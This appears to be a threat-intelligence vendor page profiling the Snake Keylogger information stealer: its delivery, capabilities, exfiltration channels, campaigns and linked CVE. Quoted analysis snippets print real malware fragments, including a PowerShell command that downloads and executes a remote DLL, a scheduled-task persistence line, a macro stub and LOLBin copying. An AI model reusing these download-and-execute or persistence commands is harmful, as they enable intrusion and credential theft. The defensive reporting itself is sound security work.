Snake Keylogger is a .NET-based information-stealing malware family active since at least late 2020 and commonly used in commodity phishing and malware-delivery campaigns. It targets Microsoft Windows systems and is frequently distributed through malicious email attachments, including Office documents with macros, disk image files, archives, embedded-document PDF lures, and exploit chains abusing older Office vulnerabilities such as CVE-2017-11882. It is also delivered by third-party loaders and crypters, including RelicRace/RelicSource, QuirkyLoader, Cruciferra, and other staged download chains, and has been observed alongside families such as Agent Tesla, FormBook, Remcos, XWorm, and RedLine.
The malware’s core function is credential and information theft. Reported capabilities include keylogging, clipboard capture, screenshot collection, and theft of saved credentials from web browsers, email clients, FTP clients, messaging applications, and other desktop software. Some variants also gather host profiling data such as username, computer name, time, public IP, and country. Analysts have documented heavy obfuscation in multiple samples, anti-analysis delays, and stealthier execution methods including reflective loading, process hollowing, and in-memory execution through loaders.
Snake Keylogger supports multiple exfiltration channels depending on the variant and campaign. Observed methods include SMTP, FTP, and Telegram-based submission. Persistence has also been documented in some variants through startup-folder manipulation, scheduled tasks, or registry changes. The malware is widely used in opportunistic and targeted phishing operations affecting government entities, enterprises, and sectors including energy, oil and gas, electronics, manufacturing, finance, healthcare, hospitality, and public-sector organizations. Its prevalence across many unrelated campaigns indicates broad adoption in the cybercrime ecosystem rather than exclusive use by a single threat actor.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Examining the OLE object reveals shellcode that exploits the CVE-2017-11882 remote code execution vulnerability in Equation Editor. | The executable is Snake Keylogger, a family of information-stealing malware that we have written about before.
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Як пейлоад використовуються програми-стілери, а саме: Formbook та Snake Keylogger (ексфільтрація за допомогою API Telegram).
Overview Snake Keylogger, also known as 404 Keylogger, is malware that has been categorized as a keylogger and that has evolved over time, acquiring stealer capabilities that complement its functions and have made it more powerful over the years.
... TA2715 and TA2536, both of which favored Snake Keylogger ...
... TA2715 and TA2536, both of which favored Snake Keylogger ...
“The S2 Group’s intelligence team has identified… a new phishing campaign by Snake Keylogger, a Russian origin stealer programmed in .NET… The campaign… using spearphishing emails offering oil products… [and] the Sideloading Dll technique to load Snake Keylogger…”
“The S2 Group’s intelligence team has identified… a new phishing campaign by Snake Keylogger, a Russian origin stealer programmed in .NET… The campaign… using spearphishing emails offering oil products… [and] the Sideloading Dll technique to load Snake Keylogger…”
29 distinct techniques documented for this family, organized by ATT&CK tactic.
The campaign spreads via phishing emails tailored to employees at each company being targeted.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
cmd = "C:\ProgramData\ESETNONU.com -EP B -NoP -c i'e'x([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create(' hxxps://www[.]mediafire[.]com/file/w2uuz1cy4cl2gup/7.dll/file ').GetResponse().GetResponseStream()).ReadToend());";
The stream ID 30 looks the most interesting. It contains indeed a macro... Sub Auto_Open()
Open koaksdokasd For Output As #1... Print #1, "function ..." ... Create ("wscript C:\Users\Public\update.js")
HP’s analysts found that it attempts to abuse an old Microsoft Equation Editor vulnerability to run arbitrary code. The deployed shellcode exploits CVE-2017-11882, a remote code execution bug in Equation Editor fixed in November 2017
The relationship that caught our eye shows an external object linking and embedding (OLE) object being loaded from this URL. | If we return to our PDF document and click on “Open this file” at the prompt, Microsoft Word opens.
Because the threat actors named the embedded document "has been verified," the Open File prompt below states, "The file 'has been verified." This message could trick recipients into believing that Adobe verified the file as legitimate and that the file is safe to open.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
This variant of Snake Keylogger changes both the values of “Startup” to other folders... The program copies the Snake Keylogger file ... into this folder and renames it as “sgosr.exe”. This ensures that Snake Keylogger will be started by the Windows system every time it starts.
You can see that the script implements persistence through a scheduled task... chuchukukukaokiwDasidow.Run('schtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr ...',0);
The program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child process... It next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger.
This variant of Snake Keylogger changes both the values of “Startup” to other folders... The program copies the Snake Keylogger file ... into this folder and renames it as “sgosr.exe”. This ensures that Snake Keylogger will be started by the Windows system every time it starts.
The PDF is obfuscated in a classic way, all objects are embedded in an Object Stream... No need to deobfuscate the macro completely, we see interesting strings... It is a PowerShell script with some Base64 content.
var pit = king.CopyFile ("C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe", kiii); ... megamon = "C:\ProgramData\milon.com"; var pit = dihearter.CopyFile ("C:\Windows\System32\mshta.exe", megamon);
The program then creates a suspended child process and deploys the compressed Snake Keylogger payload into the child process... It next calls SetThreadContext() to make the child process point to the entry point function of Snake Keylogger.
it downloads Snake Keylogger module ... which is a RC4 encrypted DLL file. Next, it calls “ToRc()” function to RC4 decrypt it using a decryption key "Dllzjn".
In Windows 8 and Windows 10, simply double-clicking on virtual disk files will automatically mount its content. This feature is appealing for threat actors because it takes a small number of user clicks to execute the malware.
The dropped malware is generally able to steal private information, log keyboard strokes and steal browsing data.
The first analysis reports it as a Snake keylogger... "credentials": ... ftp ... The malware seems active based on the collected data that I found... 'Passwords ID' files
chuchukukukaokiwDasidow.Run("taskkill /f /im WinWord.exe",0); ... Excel.exe ... POWERPNT.exe
Snake Keylogger collects basic information regarding the victim’s Windows system, like User name, PC name, System Date and Time, Public IP address, and Country
If the key is not found, the client sends a 'sendplugin' command to the C2 server ... The C2 server then responds with the command 'savePlugin' along with a base64 encoded string containing the plugin | We observed XWorm RAT Operators execute additional malware, such as: DarkCloud Stealer ... Remcos RAT
217 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
59 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Keylogger malware family listed among the payloads supported by Cruciferra.
Keylogger mentioned in comparative tables of infection vectors, targeted industries, IOCs, and exfiltration channels, but not profiled as a main focus.
Keylogger malware distributed via Cruciferra.
Credential-stealing keylogger delivered as a final payload by the TTF Trap campaign; the 'Best Private LOGGER' variant matches Snake Keylogger collection code.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.